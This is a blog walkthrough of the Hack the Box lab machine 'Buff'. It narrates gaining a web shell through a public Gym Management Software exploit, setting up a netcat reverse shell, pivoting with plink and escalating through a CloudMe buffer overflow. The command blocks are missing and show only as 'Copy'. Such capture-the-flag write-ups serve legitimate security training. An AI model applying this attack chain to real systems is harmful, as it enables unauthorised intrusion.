Introduction

The box Buff from Hack the Box is one of the best ways to dip your toe into buffer overflow exploits. This box also has one of the easiest user flags I have ever seen.

With every machine, I start with AutoRecon:

Copy

With AutoRecon I definitely recommend using the -vv flag as the on-screen input you see well its running can be extremely useful.

I saw Port 8080 open as an open port so I immediately went to the browser.

mrb3n's Bro Hut

mrb3n’s Bro Hut

I navigated through the pages and noticed:

Gum Management Software 1.0

Gum Management Software 1.0

This was a direct clue and I Googled it word for word with exploit at the end and found: Exploit DB.

Copy
Using Exploit DB 48506 to connect to the web shell.

Using Exploit DB 48506 to connect to the web shell.

You officially have the easiest user flag. The first thing I looked for was persistence, thankfully plink.exe and nc.exe were in the Uploads directory. After rooting I went back and looked for the best way to get the files you will need (if a good samaritan didn’t leave them on the box).

Downloading Files

First – Setup a local HTTP Server:
Copy

Next, grab the files you will need:
Copy

Finally
Copy

Nice! Now you are that good samaritan. Next, start your reverse shell and use:

Copy
NC session activate!

NC session activate!

Once on the box, I went into Public directory and created a folder for myself to work from. I tried running WinPEAS and Seatbelt with no success. Eventually, I found CloudMe_1112.exe sitting in the Downloads folder.

The moment I began crying :(.

The moment I began crying :(.

I began to cry. It occurred to me that BUFF and a ‘random’ .EXE probably meant a Buffer Exploit (which I am terrible at). Thankfully this box is EASY and Google lead me to: Exploit DB 48389.

After downloading the exploit you will see a line which references MSFVenom. This is building the shell code required to access the machine:

Copy

The first thing I would recommend is to make a directory inside the Public directory and copy Plink/Netcat to it. This makes it a ton easier as other people might mess up progress.

Copy

I would recommend using the -v payload syntax as I had to find/replace as the default put everything to buf. Copy the output into the exploit. Next, I had to add import sys to line 12 as I had run errors without it.

48389.txt – Download

I tried to run the exploit and realized that python was not available on the machine. I tried doing py2exe but had issues with compiling. Finally, I did a pivot using plink.exe.

To do a successful pivot make sure SSH is running on your Attacking Machine. Below is a reference to the command I used. Inside the Public folder, I ran the following:

Copy

If you notice above I used 8888 as it is referenced on line 53 of the exploit for the connection. If you do above correctly you will be back on your VM. Finally run the following:

Copy
Rooted.

Rooted

Published On: January 17th, 2021 / Categories: HTB, Technology / Tags: , , , , /

Leave A Comment